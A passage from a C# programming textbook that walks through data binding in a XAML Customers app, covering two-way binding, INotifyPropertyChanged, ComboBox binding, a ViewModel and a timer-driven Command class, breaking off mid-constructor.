    private string _title;
    public string Title
    {
        get => this._title;
        set
        {
            this._title = value;
        }
    }

    private string _firstName;
    public string FirstName
    {
        get => this._firstName;
        set
        {
            this._firstName = value;
        }
    }

    private string _lastName;
    public string LastName
    {
        get => this._lastName;
        set
        {
            this._lastName = value;
        }
    }

    private string _emailAddress;
    public string EmailAddress
    {
        get => this._emailAddress;
        set
        {
            this._emailAddress = value;
        }
    }

    private string _phone;
    public string Phone
    {
        get => this._phone;
        set
        {
            this._phone = value;
        }
    }
}
You might be wondering why the property setters are not implemented
as expression-bodied members, given that all they do is set the value in a
private field. However, you will add additional code to these properties
in a later exercise.
6. In Solution Explorer, in the Customers project, double-click the
MainPage.xaml file to display the user interface for the application in
the Design View window.
7. In the XAML pane, locate the markup for the id TextBox control.
Modify the XAML markup that sets the Text property for this control as
shown here in bold:
<TextBox Grid.Row="1" Grid.Column="1" x:Name="id" ...
Text="{Binding CustomerID}" .../>
The syntax Text=”{Binding Path}” specifies that the value of the Text
property will be provided by the value of the Path expression at runtime.
In this case, Path is set to CustomerID, so the value held in the
CustomerID expression will be displayed by this control. However, you
need to provide a bit more information to indicate that CustomerID is
actually a property of a Customer object. To do this, you set the
DataContext property of the control, which you will do shortly.
8. Add the following binding expressions for each of the other text controls
on the form. Apply data binding to the TextBox controls in the
customersTabularView and customersColumnarView Grid controls, as
shown in bold in the following code. (The ComboBox controls require
slightly different handling, which you will address in the section “Using
data binding with a ComboBox control” later in this chapter.)
<Grid x:Name="customersTabularView" ...>
...
<TextBox Grid.Row="1" Grid.Column="5" x:Name="firstName" ...
Text="{Binding FirstName}" .../>
<TextBox Grid.Row="1" Grid.Column="7" x:Name="lastName" ...
Text="{Binding LastName}" .../>
...
<TextBox Grid.Row="3" Grid.Column="3" Grid.ColumnSpan="5"
x:Name="email" ... Text="{Binding EmailAddress}" .../>
...
<TextBox Grid.Row="5" Grid.Column="3" Grid.ColumnSpan="3"
x:Name="phone" ... Text="{Binding Phone}" .../>
</Grid>
<Grid x:Name="customersColumnarView" Margin="10,20,10,20"
Visibility="Collapsed">
...
<TextBox Grid.Row="0" Grid.Column="1" x:Name="cId" ...
Text="{Binding CustomerID}" .../>
...
<TextBox Grid.Row="2" Grid.Column="1" x:Name="cFirstName"
...
Text="{Binding FirstName}" .../>
<TextBox Grid.Row="3" Grid.Column="1" x:Name="cLastName" ...
Text="{Binding LastName}" .../>
...
<TextBox Grid.Row="4" Grid.Column="1" x:Name="cEmail" ...
Text="{Binding EmailAddress}" .../>
...
<TextBox Grid.Row="5" Grid.Column="1" x:Name="cPhone" ...
Text="{Binding Phone}" .../>
</Grid>
Notice how the same binding expression can be used with more than one
control. For example, the expression {Binding CustomerID} is
referenced by the id and cId TextBox controls, which causes both
controls to display the same data.
9. In Solution Explorer, expand the MainPage.xaml file, and then double-
click the MainPage.xaml.cs file to display the code for the
MainPage.xaml form in the Code and Text Editor window. Add the
statement shown below in bold to the MainPage constructor.
public MainPage()
{
this.InitializeComponent();
Customer customer = new Customer
{
CustomerID = 1,
Title = "Mr",
FirstName = "John",
LastName = "Sharp",
EmailAddress = "[email protected]",
Phone = "111-1111"
};
}
This code creates a new instance of the Customer class and populates it
with some sample data.
10. After the code that creates the new Customer object, add the following
statement shown in bold:
Customer customer = new Customer
{
...
};
this.DataContext = customer;
This statement specifies the object to which controls on the MainPage
form should bind. In each of the controls, the XAML markup
Text=”{Binding Path}” will be resolved against this object. For
example, the id TextBox and cId TextBox controls both specify
Text=”{Binding CustomerID}”, so they will display the value found in
the CustomerID property of the Customer object to which the form is
bound.
Note In this example, you have set the DataContext property of the
form, so the same data binding automatically applies to all the
controls on the form. You can also set the DataContext property
for individual controls if you need to bind specific controls to
different objects.
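To illustrate that last point, the following sketch (the customer2 variable and the choice of control are hypothetical) binds a single control to a different object, while the remaining controls continue to resolve their bindings against the page-level DataContext:

// Hypothetical second customer used only by one control.
Customer customer2 = new Customer { CustomerID = 2, LastName = "Doe" };

// Only the bindings inside cLastName resolve against customer2;
// every other control still uses this.DataContext.
this.cLastName.DataContext = customer2;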
11. On the Debug menu, click Start Debugging to build and run the app.
Verify that the form occupies the full screen and displays the details for
the customer John Sharp, as shown in the following image:
12. Resize the app window to display it in the narrow view. Verify that it
displays the same data, as illustrated here:
The controls displayed in the narrow view are bound to the same data as
the controls displayed in the full-screen view.
13. In the narrow view, change the email address to
[email protected].
14. Expand the app window to switch to the wide view.
Notice that the email address displayed in this view has not changed.
15. Return to Visual Studio and stop debugging.
16. In Visual Studio, display the code for the Customer class in the Code
and Text Editor window and set a breakpoint in the set property accessor
for the EmailAddress property.
17. On the Debug menu, click Start Debugging to build and run the
application again.
18. When the debugger reaches the breakpoint for the first time, press F5 to
continue running the app.
19. When the UI for the Customers app appears, resize the application
window to display the narrow view and change the email address to
[email protected].
20. Expand the app window back to the wide view.
Notice that the debugger does not reach the breakpoint in the set
accessor for the EmailAddress property; the updated value is not written
back to the Customer object when the email TextBox loses the focus.
21. Return to Visual Studio and stop debugging.
22. Remove the breakpoint in the set accessor of the EmailAddress property
in the Customer class.
Modifying data by using data binding
In the previous exercise, you saw how easily data in an object could be
displayed by using data binding. However, data binding is a one-way
operation by default, and any changes you make to the displayed data are not
copied back to the data source. In the exercise, you saw this when you
changed the email address displayed in the narrow view; when you switched
back to the wide view, the data had not changed. You can implement
bidirectional data binding by modifying the Mode parameter of the Binding
specification in the XAML markup for a control. The Mode parameter
indicates whether data binding is one-way or two-way. This is what you will
do next.
Implement TwoWay data binding to modify customer information
1. Display the MainPage.xaml file in the Design View window and modify
the XAML markup for each of the TextBox controls as shown in bold in
the following code:
<Grid x:Name="customersTabularView" ...>
...
<TextBox Grid.Row="1" Grid.Column="1" x:Name="id" ...
Text="{Binding CustomerID, Mode=TwoWay}" .../>
...
<TextBox Grid.Row="1" Grid.Column="5" x:Name="firstName" ...
Text="{Binding FirstName, Mode=TwoWay}" .../>
<TextBox Grid.Row="1" Grid.Column="7" x:Name="lastName" ...
Text="{Binding LastName, Mode=TwoWay}" .../>
...
<TextBox Grid.Row="3" Grid.Column="3" Grid.ColumnSpan="5"
x:Name="email" ... Text="{Binding EmailAddress, Mode=TwoWay}"
.../>
...
<TextBox Grid.Row="5" Grid.Column="3" Grid.ColumnSpan="3"
x:Name="phone" ... Text="{Binding Phone, Mode=TwoWay}" ..."/>
</Grid>
<Grid x:Name="customersColumnarView" Margin="10,20,10,20" ...>
...
<TextBox Grid.Row="0" Grid.Column="1" x:Name="cId" ...
Text="{Binding CustomerID, Mode=TwoWay}" .../>
...
<TextBox Grid.Row="2" Grid.Column="1" x:Name="cFirstName"
...
Text="{Binding FirstName, Mode=TwoWay}" .../>
<TextBox Grid.Row="3" Grid.Column="1" x:Name="cLastName" ...
Text="{Binding LastName, Mode=TwoWay}" .../>
...
<TextBox Grid.Row="4" Grid.Column="1" x:Name="cEmail" ...
Text="{Binding EmailAddress, Mode=TwoWay}" .../>
...
<TextBox Grid.Row="5" Grid.Column="1" x:Name="cPhone" ...
Text="{Binding Phone, Mode=TwoWay}" .../>
</Grid>
The Mode parameter to the Binding specification indicates whether data
binding is one-way (the default) or two-way. Setting Mode to TwoWay
causes any changes made by the user to be passed back to the object to
which a control is bound.
2. On the Debug menu, click Start Debugging to build and run the app
again.
3. With the app in the wide view, change the email address to
[email protected], and then resize the window to display the app
in the narrow view.
Notice that despite the change in the data binding to TwoWay mode, the
email address displayed in the narrow view has not been updated; it is
still [email protected].
4. Return to Visual Studio and stop debugging.
Clearly, something is not working correctly! The problem now is not that
the data has not been updated but rather that the view is not displaying the
latest version of the data. (If you reinstate the breakpoint in the set accessor
for the EmailAddress property of the Customer class and run the app in the
debugger, you will see the debugger reach the breakpoint whenever you
change the value of the email address and move the focus away from the
TextBox control.) Despite appearances, the data-binding process is not magic,
and a data binding does not know when the data to which it is bound has been
changed. The object needs to inform the data binding of any modifications by
sending a PropertyChanged event to the UI. This event is part of an interface
named INotifyPropertyChanged, and all objects that support two-way data
binding should implement this interface. You will implement this interface in
the next exercise.
Implement the INotifyPropertyChanged interface in the Customer class
1. In Visual Studio, display the Customer.cs file in the Code and Text
Editor window.
2. Add the following using directive to the list at the top of the file:
using System.ComponentModel;
The INotifyPropertyChanged interface is defined in this namespace.
3. Modify the definition of the Customer class to specify that it implements
the INotifyPropertyChanged interface, as shown here in bold:
public class Customer : INotifyPropertyChanged
{
...
}
4. After the Phone property at the end of the Customer class, add the
PropertyChanged event shown in bold in the following code:
public class Customer : INotifyPropertyChanged
{
...
private string _phone;
public string Phone {
get => this._phone;
set { this._phone = value; }
}
public event PropertyChangedEventHandler PropertyChanged;
}
This event is the only item that the INotifyPropertyChanged interface
defines. All objects that implement this interface must provide this
event, and they should raise this event whenever they want to notify the
outside world of a change to a property value.
5. Add the OnPropertyChanged method shown below in bold to the
Customer class, after the PropertyChanged event:
public class Customer : INotifyPropertyChanged
{
...
public event PropertyChangedEventHandler PropertyChanged;
protected virtual void OnPropertyChanged(string
propertyName)
{
if (PropertyChanged != null)
{
PropertyChanged(this,
new PropertyChangedEventArgs(propertyName));
}
}
}
The OnPropertyChanged method raises the PropertyChanged event.
The PropertyChangedEventArgs parameter to the PropertyChanged
event should specify the name of the property that has changed. This
value is passed in as a parameter to the OnPropertyChanged method.
Note You can reduce the code in the OnPropertyChanged method
to a single statement, using the null conditional operator (?.) and
the Invoke method, like this:
PropertyChanged?.Invoke(this,
new PropertyChangedEventArgs(propertyName));
However, my personal preference is readability over terse code;
it makes your applications easier to maintain.
6. Modify the property set accessors for each of the properties in the
Customer class to call the OnPropertyChanged method whenever the
value that they contain is modified, as shown in bold here:
public class Customer : INotifyPropertyChanged
{
    private int _customerID;
    public int CustomerID
    {
        get => this._customerID;
        set
        {
            this._customerID = value;
            this.OnPropertyChanged(nameof(CustomerID));
        }
    }

    private string _title;
    public string Title
    {
        get => this._title;
        set
        {
            this._title = value;
            this.OnPropertyChanged(nameof(Title));
        }
    }

    private string _firstName;
    public string FirstName
    {
        get => this._firstName;
        set
        {
            this._firstName = value;
            this.OnPropertyChanged(nameof(FirstName));
        }
    }

    private string _lastName;
    public string LastName
    {
        get => this._lastName;
        set
        {
            this._lastName = value;
            this.OnPropertyChanged(nameof(LastName));
        }
    }

    private string _emailAddress;
    public string EmailAddress
    {
        get => this._emailAddress;
        set
        {
            this._emailAddress = value;
            this.OnPropertyChanged(nameof(EmailAddress));
        }
    }

    private string _phone;
    public string Phone
    {
        get => this._phone;
        set
        {
            this._phone = value;
            this.OnPropertyChanged(nameof(Phone));
        }
    }
    ...
}
The nameof operator
The nameof operator demonstrated in the Customer class is a little-
used but highly useful feature of C# in code such as this. It returns
the name of the variable passed in as its parameter as a string.
Without using the nameof operator, you would have had to use
hard-coded string values. For example:
public int CustomerID
{
get { return this._customerID; }
set
{
this._customerID = value;
this.OnPropertyChanged("CustomerID");
}
}
Although using the string values requires less typing, consider
what would happen if you needed to change the name of the
property at some point in the future. Using the string approach, you
would need to modify the string value as well. If you didn’t, the
code would still compile and run, but any changes made to the
property value at run time would not be notified, leading to
difficult-to-find bugs. Using the nameof operator, if you change the
name of the property but forget to change the argument to nameof,
the code will not compile, alerting you immediately to an error that
should be quick and easy to fix.
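A related technique that you might encounter in other codebases uses the [CallerMemberName] attribute from the System.Runtime.CompilerServices namespace, which instructs the compiler to supply the name of the calling member automatically. The following is offered only as a sketch of that alternative pattern; the exercises in this book use nameof.

using System.ComponentModel;
using System.Runtime.CompilerServices;

public class Customer : INotifyPropertyChanged
{
    public event PropertyChangedEventHandler PropertyChanged;

    // The compiler substitutes the caller's member name for propertyName,
    // so a property setter can simply call this.OnPropertyChanged();
    protected virtual void OnPropertyChanged(
        [CallerMemberName] string propertyName = null)
    {
        PropertyChanged?.Invoke(this,
            new PropertyChangedEventArgs(propertyName));
    }
}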
7. On the Debug menu, click Start Debugging to build and run the app
again.
8. When the Customers form appears, change the email address to
[email protected], and change the phone number to 222-2222.
9. Resize the window to display the app in the narrow view and verify that
the email address and phone number have changed.
10. Change the first name to James, expand the window to display the wide
view, and verify that the first name has changed.
11. Return to Visual Studio and stop debugging.
Using data binding with a ComboBox control
Using data binding with a control such as a TextBox or TextBlock is a
relatively straightforward matter. On the other hand, ComboBox controls
require a little more attention. The issue is that a ComboBox control actually
displays two things:
- A list of values in the drop-down list from which the user can select an item
- The value of the currently selected item
If you implement data binding to display a list of items in the drop-down
list of a ComboBox control, the value that the user selects must be a member
of this list. In the Customers app, you can configure data binding for the
selected value in the title ComboBox control by setting the SelectedValue
property, like this:
<ComboBox ... x:Name="title" ... SelectedValue="{Binding Title}" ...
/>
However, remember that the list of values for the drop-down list is hard-
coded into the XAML markup, like this:
<ComboBox ... x:Name="title" ... >
<ComboBoxItem Content="Mr"/>
<ComboBoxItem Content="Mrs"/>
<ComboBoxItem Content="Ms"/>
<ComboBoxItem Content="Miss"/>
</ComboBox>
This markup is not applied until the control has been created, so the value
specified by the data binding is not found in the list because the list does not
yet exist when the data binding is constructed. The result is that the value is
not displayed. You can try this if you like—configure the binding for the
SelectedValue property as just shown and run the app. The title ComboBox
will be empty when it is initially displayed, despite the fact that the customer
has the title of Mr.
There are several solutions to this problem, but the simplest is to create a
data source that contains the list of valid values and then specify that the
ComboBox control should use this list as its set of values for the drop-down.
Also, you need to do this before the data binding for the ComboBox is
applied.
Implement data binding for the title ComboBox controls
1. In Visual Studio, display the MainPage.xaml.cs file in the Code and
Text Editor window.
2. Add the following code shown in bold to the MainPage constructor:
public MainPage()
{
this.InitializeComponent();
List<string> titles = new List<string>
{
"Mr", "Mrs", "Ms", "Miss"
};
this.title.ItemsSource = titles;
this.cTitle.ItemsSource = titles;
Customer customer = new Customer
{
...
};
this.DataContext = customer;
}
This code creates a list of strings containing the valid titles that
customers can have. The code then sets the ItemsSource property of both
title ComboBox controls to reference this list (remember that each view
has a ComboBox control).
Note In a commercial app, you would most likely retrieve the list
of values displayed by a ComboBox control from a database or
some other data source rather than a hard-coded list, as shown in
this example.
The placement of this code is important. It must run before the statement
that sets the DataContext property of the MainPage form because this
statement is when the data binding to the controls on the form occurs.
3. Display the MainPage.xaml file in the Design View window.
4. Modify the XAML markup for the title and cTitle ComboBox controls,
as shown here in bold:
<Grid x:Name="customersTabularView" ...>
...
<ComboBox Grid.Row="1" Grid.Column="3" x:Name="title" ...
SelectedValue="{Binding Title, Mode=TwoWay}">
</ComboBox>
...
</Grid>
<Grid x:Name="customersColumnarView" ...>
...
<ComboBox Grid.Row="1" Grid.Column="1" x:Name="cTitle" ...
SelectedValue="{Binding Title, Mode=TwoWay}">
</ComboBox>
...
</Grid>
Notice that the list of ComboBoxItem elements for each control has been
removed and that the SelectedValue property is configured to use data
binding with the Title field in the Customer object.
5. On the Debug menu, click Start Debugging to build and run the
application.
6. Verify that the value of the customer’s title is displayed correctly (it
should be Mr). Click the drop-down arrow for the ComboBox control
and verify that it contains the values Mr, Mrs, Ms, and Miss.
7. Resize the window to display the app in the narrow view and perform
the same checks. Note that you can change the title, and when you
switch back to the wide view, the new title is displayed.
8. Return to Visual Studio and stop debugging.
Creating a ViewModel
You have now seen how to configure data binding to connect a data source to
the controls in a user interface, but the data source that you have been using
is very simple, consisting of a single customer. In the real world, the data
source is likely to be much more complex, comprising collections of different
types of objects. Remember that in MVVM terms, the data source is often
provided by the model, and the UI (the view) communicates with the model
only indirectly through a ViewModel object. The rationale behind this
approach is that the model and the views that display the data provided by the
model should be independent; you should not have to change the model if the
user interface is modified, nor should you be required to adjust the UI if the
underlying model changes.
The ViewModel provides the connection between the view and the model,
and it also implements the business logic for the app. Again, this business
logic should be independent of the view and the model. The ViewModel
exposes the business logic to the view by implementing a collection of
commands. The UI can trigger these commands based on the way in which
the user navigates through the app. In the following exercise, you will extend
the Customers app by implementing a model that contains a list of Customer
objects and creating a ViewModel that provides commands with which a user
can move between customers in the view.
Create a ViewModel for managing customer information
1. Open the Customers solution, which is located in the \Microsoft
Press\VCSBS\Chapter 26\ViewModel folder in your Documents folder.
This project contains a completed version of the Customers app from the
previous set of exercises; if you prefer, you can continue to use your
own version of the project.
2. In Solution Explorer, right-click the Customers project, point to Add,
and then click Class.
3. In the Add New Items - Customers dialog box, in the Name box, type
ViewModel.cs, and then click Add.
You will use this class to provide a basic ViewModel that contains a
collection of Customer objects. The user interface will bind to the data
exposed by this ViewModel.
4. In the Code and Text Editor window displaying the ViewModel.cs file,
mark the class as public and add the code shown in bold in the following
example to the ViewModel class:
public class ViewModel
{
private List<Customer> customers;
public ViewModel()
{
this.customers = new List<Customer>
{
new Customer
{
CustomerID = 1,
Title = "Mr",
FirstName="John",
LastName="Sharp",
EmailAddress="[email protected]",
Phone="111-1111"
},
new Customer
{
CustomerID = 2,
Title = "Mrs",
FirstName="Diana",
LastName="Sharp",
EmailAddress="[email protected]",
Phone="111-1112"
},
new Customer
{
CustomerID = 3,
Title = "Ms",
FirstName="Francesca",
LastName="Sharp",
EmailAddress="[email protected]",
Phone="111-1113"
}
};
}
}
The ViewModel class uses a List<Customer> object as its model, and
the constructor populates this list with some sample data. Strictly
speaking, this data should be held in a separate Model class, but for the
purposes of this exercise we will make do with this sample data.
5. Add the private variable currentCustomer shown in bold in the
following code to the ViewModel class, and initialize this variable to
zero in the constructor:
public class ViewModel
{
private List<Customer> customers;
private int currentCustomer;
public ViewModel()
{
this.currentCustomer = 0;
this.customers = new List<Customer>
{
...
}
}
}
The ViewModel class will use this variable to track which Customer
object the view is currently displaying.
6. Add the Current property shown below in bold to the ViewModel class,
after the constructor:
public class ViewModel
{
...
public ViewModel()
{
...
}
public Customer Current
{
get => this.customers.Count > 0 ?
this.customers[currentCustomer] : null;
}
}
The Current property provides access to the current Customer object in
the model. If there are no customers, it returns a null object.
Note It is good practice to provide controlled access to a data
model; only the ViewModel should be able to modify the model.
However, this restriction does not prevent the view from being
able to update the data presented by the ViewModel; it just cannot
switch the model and make it refer to a different data source.
7. Open the MainPage.xaml.cs file in the Code and Text Editor window.
8. In the MainPage constructor, remove the code that creates the Customer
object and replace it with a statement that creates an instance of the
ViewModel class. Change the statement that sets the DataContext
property of the MainPage object to reference the new ViewModel object,
as shown here in bold:
public MainPage()
{
...
this.cTitle.ItemsSource = titles;
ViewModel viewModel = new ViewModel();
this.DataContext = viewModel;
}
9. Open the MainPage.xaml file in the Design View window.
10. In the XAML pane, modify the data bindings for the TextBox and
ComboBox controls to reference properties through the Current object
presented by the ViewModel, as shown in bold in the following code:
<Grid x:Name="customersTabularView" ...>
...
<TextBox Grid.Row="1" Grid.Column="1" x:Name="id" ...
Text="{Binding Current.CustomerID, Mode=TwoWay}" .../>
<TextBox Grid.Row="1" Grid.Column="5" x:Name="firstName" ...
Text="{Binding Current.FirstName, Mode=TwoWay }" .../>
<TextBox Grid.Row="1" Grid.Column="7" x:Name="lastName" ...
Text="{Binding Current.LastName, Mode=TwoWay }" .../>
<ComboBox Grid.Row="1" Grid.Column="3" x:Name="title" ...
SelectedValue="{Binding Current.Title, Mode=TwoWay}">
</ComboBox>
...
<TextBox Grid.Row="3" Grid.Column="3" ... x:Name="email" ...
Text="{Binding Current.EmailAddress, Mode=TwoWay }" .../>
...
<TextBox Grid.Row="5" Grid.Column="3" ... x:Name="phone" ...
Text="{Binding Current.Phone, Mode=TwoWay }" .../>
</Grid>
<Grid x:Name="customersColumnarView" Margin="20,10,20,110" ...>
...
<TextBox Grid.Row="0" Grid.Column="1" x:Name="cId" ...
Text="{Binding Current.CustomerID, Mode=TwoWay }" .../>
<TextBox Grid.Row="2" Grid.Column="1" x:Name="cFirstName"
...
Text="{Binding Current.FirstName, Mode=TwoWay }" .../>
<TextBox Grid.Row="3" Grid.Column="1" x:Name="cLastName" ...
Text="{Binding Current.LastName, Mode=TwoWay }" .../>
<ComboBox Grid.Row="1" Grid.Column="1" x:Name="cTitle" ...
SelectedValue="{Binding Current.Title, Mode=TwoWay}">
</ComboBox>
...
<TextBox Grid.Row="4" Grid.Column="1" x:Name="cEmail" ...
Text="{Binding Current.EmailAddress, Mode=TwoWay }" .../>
...
<TextBox Grid.Row="5" Grid.Column="1" x:Name="cPhone" ...
Text="{Binding Current.Phone, Mode=TwoWay }" .../>
</Grid>
11. On the Debug menu, click Start Debugging to build and run the app.
12. Verify that the app displays the details of John Sharp (the first customer
in the customers list). Change the details of the customer and switch
between views to prove that the data binding is still functioning
correctly.
13. Return to Visual Studio and stop debugging.
The ViewModel provides access to customer information through the
Current property, but currently, it does not supply a way to navigate between
customers. You can implement methods that increment and decrement the
currentCustomer variable so that the Current property retrieves different
customers, but you should do so in a manner that does not tie the view to the
ViewModel. The most commonly accepted technique is to use the Command
pattern. In this pattern, the ViewModel exposes methods in the form of
commands that the view can invoke. The trick is to avoid explicitly
referencing these methods by name in the code for the view. To do this,
XAML makes it possible for you to declaratively bind commands to the
actions triggered by controls in the UI, as you will see in the exercises in the
next section.
Adding commands to a ViewModel
The XAML markup that binds the action of a control to a command requires
that commands exposed by a ViewModel implement the ICommand
interface. This interface defines the following items:
CanExecute This method returns a Boolean value indicating whether
the command can run. Using this method, a ViewModel can enable or
disable a command depending on the context. For example, a
command that fetches the next customer from a list should be able to
run only if there is a next customer to fetch; if there are no more
customers, the command should be disabled.
Execute This method runs when the command is invoked.
CanExecuteChanged This event is triggered when the state of the
ViewModel changes. Under these circumstances, commands that could
previously run might now be disabled and vice versa. For example, if
the UI invokes a command that fetches the next customer from a list, if
that customer is the last customer, then subsequent calls to CanExecute
should return false. In these circumstances, the CanExecuteChanged
event should fire to indicate that the command has been disabled.
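For reference, the ICommand interface in the System.Windows.Input namespace
is declared as follows:

public interface ICommand
{
    // Returns true if the command can run in the current state
    bool CanExecute(object parameter);

    // Performs the work of the command
    void Execute(object parameter);

    // Raised when the result of CanExecute might have changed
    event EventHandler CanExecuteChanged;
}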
In the next exercise, you will create a generic class that implements the
ICommand interface.
Implement the Command class
1. In Visual Studio, right-click the Customers project, point to Add, and
then click Class.
2. In the Add New Item - Customers dialog box, select the Class template.
In the Name box, type Command.cs, and then click Add.
3. In the Code and Text Editor window displaying the Command.cs file,
add the following using directive to the list at the top of the file:
using System.Windows.Input;
The ICommand interface is defined in this namespace.
4. Make the Command class public and specify that it implements the
ICommand interface, as follows in bold:
public class Command : ICommand
{
}
5. Add the following private fields to the Command class:
public class Command : ICommand
{
private Action methodToExecute = null;
private Func<bool> methodToDetectCanExecute = null;
}
The Action and Func types are briefly described in Chapter 20,
“Decoupling application logic and handling events.” The Action type is
a delegate that you can use to reference a method that takes no
parameters and does not return a value, and the Func<T> type is also a
delegate that can reference a method that takes no parameters but returns
a value of the type specified by the type parameter T. In this class, you
will use the methodToExecute field to reference the code that the
Command object will run when it is invoked by the view. The
methodToDetectCanExecute field will be used to reference the method
that detects whether the command can run (it may be disabled for some
reason, depending on the state of the app or the data).
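As a quick illustration of these delegate types (the delegate bodies here are
purely illustrative, and Debug.WriteLine assumes a using directive for
System.Diagnostics):

Action sayHello = () => Debug.WriteLine("Hello");   // no parameters, no return value
Func<bool> isReady = () => DateTime.Now.Hour >= 9;  // no parameters, returns a bool

sayHello();               // invokes the referenced code
bool ready = isReady();   // invokes the referenced code and captures the result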
6. Add a constructor to the Command class. This constructor should take
two parameters: an Action object and a Func<T> object. Assign these
parameters to the methodToExecute and methodToDetectCanExecute
fields, as shown here in bold:
public class Command : ICommand
{
...
public Command(Action methodToExecute, Func<bool>
methodToDetectCanExecute)
{
this.methodToExecute = methodToExecute;
this.methodToDetectCanExecute =
methodToDetectCanExecute;
}
}
The ViewModel will create an instance of this class for each command.
The ViewModel will supply the method to run the command and the
method to detect whether the command should be enabled when it calls
the constructor.
7. Implement the Execute and CanExecute methods of the Command class
by using the methods referenced by the methodToExecute and
methodToDetectCanExecute fields, as follows:
public class Command : ICommand
{
...
public Command(Action methodToExecute,
Func<bool> methodToDetectCanExecute)
{
...
}
public void Execute(object parameter)
{
this.methodToExecute();
}
public bool CanExecute(object parameter)
{
if (this.methodToDetectCanExecute == null)
{
return true;
}
else
{
return this.methodToDetectCanExecute();
}
}
}
Notice that if the ViewModel provides a null reference for the
methodToDetectCanExecute parameter of the constructor, the default
action is to assume that the command can run, and the CanExecute
method returns true.
8. Add the public CanExecuteChanged event to the Command class:
public class Command : ICommand
{
...
public bool CanExecute(object parameter)
{
...
}
public event EventHandler CanExecuteChanged;
}
When you bind a command to a control, the control automatically
subscribes to this event. This event should be raised by the Command
object if the state of the ViewModel is updated and the value returned by
the CanExecute method changes. The simplest strategy is to use a timer
to raise the CanExecuteChanged event once a second or so. The control
can then invoke CanExecute to determine whether the command can
still be executed and take steps to enable or disable itself depending on
the result.
9. Add the using directive shown next to the list at the top of the file:
using Windows.UI.Xaml;
10. Add the following field shown in bold to the Command class above the
constructor:
public class Command : ICommand
{
...
private Func<bool> methodToDetectCanExecute = null;
private DispatcherTimer canExecuteChangedEventTimer = null;
public Command(Action methodToExecute, Func<bool>
methodToDetectCanExecute)
{
...
}
}
The DispatcherTimer class, defined in the Windows.UI.Xaml
namespace, implements a timer that can raise an event at specified
intervals. You will use the canExecuteChangedEventTimer field to
trigger the CanExecuteChanged event at one-second intervals.
11. Add the canExecuteChangedEventTimer_Tick method shown in bold in
the following code to the end of the Command class:
public class Command : ICommand
{
...
public event EventHandler CanExecuteChanged;
void canExecuteChangedEventTimer_Tick(object sender, object
e)
{
if (this.CanExecuteChanged != null)
{
this.CanExecuteChanged(this, EventArgs.Empty);
}
}
}
This method simply raises the CanExecuteChanged event if at least one
control is bound to the command. Strictly speaking, this method should
also check whether the state of the object has changed before raising the
event. However, you will set the timer interval to a lengthy period (in
processing terms) to minimize any inefficiencies in not checking for a
change in state.
12. In the Command constructor, add the following statements shown in
bold.
public class Command : ICommand
{
...
public Command(Action methodToExecute, Func<bool>
methodToDetectCanExecute)
{
this.methodToExecute = methodToExecute;
this.methodToDetectCanExecute =
methodToDetectCanExecute;
this.canExecuteChangedEventTimer = new
DispatcherTimer();
this.canExecuteChangedEventTimer.Tick +=
canExecuteChangedEventTimer_Tick;
this.canExecuteChangedEventTimer.Interval = new
TimeSpan(0, 0, 1);
this.canExecuteChangedEventTimer.Start();
}
...
}
This code initializes the DispatcherTimer object and sets the interval for
timer events to one second before it starts the timer running.
13. On the Build menu, click Build Solution and ensure that your app builds
without errors.
You can now use the Command class to add commands to the ViewModel
class. In the next exercise, you will define commands to enable a user to
move between customers in the view.
Add NextCustomer and PreviousCustomer commands to the ViewModel
class
1. In Visual Studio, open the ViewModel.cs file in the Code and Text
Editor window.
2. Add the following using directive to the top of the file and modify the
definition of the ViewModel class to implement the
INotifyPropertyChanged interface.
...
using System.ComponentModel;
namespace Customers
{
public class ViewModel : INotifyPropertyChanged
{
...
}
}
3. Add the PropertyChanged event and OnPropertyChanged method to the
end of the ViewModel class. This is the same code that you included in
the Customer class.
public class ViewModel : INotifyPropertyChanged
{
...
public event PropertyChangedEventHandler PropertyChanged;
protected virtual void OnPropertyChanged(string
propertyName)
{
if (PropertyChanged != null)
{
PropertyChanged(this,
new PropertyChangedEventArgs(propertyName));
}
}
}
Remember that the view references data through the Current property in
the data-binding expressions for the various controls that it contains.
When the ViewModel class moves to a different customer, it must raise
the PropertyChanged event to notify the view that the data to be
displayed has changed.
4. Add the following fields and properties to the ViewModel class
immediately after the constructor:
public class ViewModel : INotifyPropertyChanged
{
...
public ViewModel()
{
...
}
private bool _isAtStart;
public bool IsAtStart
{
get => this._isAtStart;
set
{
this._isAtStart = value;
this.OnPropertyChanged(nameof(IsAtStart));
}
}
private bool _isAtEnd;
public bool IsAtEnd
{
get => this._isAtEnd;
set
{
this._isAtEnd = value;
this.OnPropertyChanged(nameof(IsAtEnd));
}
}
...
}
You will use these two properties to track the state of the ViewModel.
The IsAtStart property will be set to true when the currentCustomer
field in the ViewModel is positioned at the start of the customers
collection, and the IsAtEnd property will be set to true when the
ViewModel is positioned at the end of the customers collection.
5. Modify the constructor to set the IsAtStart and IsAtEnd properties, as
shown here in bold:
public ViewModel()
{
this.currentCustomer = 0;
this.IsAtStart = true;
this.IsAtEnd = false;
this.customers = new List<Customer>
{
...
};
}
6. After the Current property, add the Next and Previous private methods
shown in bold to the ViewModel class:
public class ViewModel : INotifyPropertyChanged
{
...
public Customer Current
{
...
}
private void Next()
{
if (this.customers.Count - 1 > this.currentCustomer)
{
this.currentCustomer++;
this.OnPropertyChanged(nameof(Current));
this.IsAtStart = false;
this.IsAtEnd = (this.customers.Count - 1 ==
this.currentCustomer);
}
}
private void Previous()
{
if (this.currentCustomer > 0)
{
this.currentCustomer--;
this.OnPropertyChanged(nameof(Current));
this.IsAtEnd = false;
this.IsAtStart = (this.currentCustomer == 0);
}
}
...
}
Note The Count property returns the number of items in a
collection, but remember that the items in a collection are
numbered from 0 to Count - 1.
These methods update the currentCustomer variable to refer to the next
(or previous) customer in the customers list. Notice that these methods
maintain the values for the IsAtStart and IsAtEnd properties and indicate
that the current customer has changed by raising the PropertyChanged
event for the Current property. These methods are private because they
should not be accessible from outside the ViewModel class. External
classes will run these methods by using commands, which you will add
in the following steps.
7. Add the NextCustomer and PreviousCustomer automatic properties to
the ViewModel class, as shown here in bold:
public class ViewModel : INotifyPropertyChanged
{
private List<Customer> customers;
private int currentCustomer;
public Command NextCustomer { get; private set; }
public Command PreviousCustomer { get; private set; }
...
}
The view will bind to these Command objects so that the user can
navigate between customers.
8. In the ViewModel constructor, set the NextCustomer and
PreviousCustomer properties to refer to new Command objects, as
follows:
public ViewModel()
{
this.currentCustomer = 0;
this.IsAtStart = true;
this.IsAtEnd = false;
this.NextCustomer = new Command(this.Next, () =>
this.customers.Count > 1 && !this.IsAtEnd);
this.PreviousCustomer = new Command(this.Previous, () =>
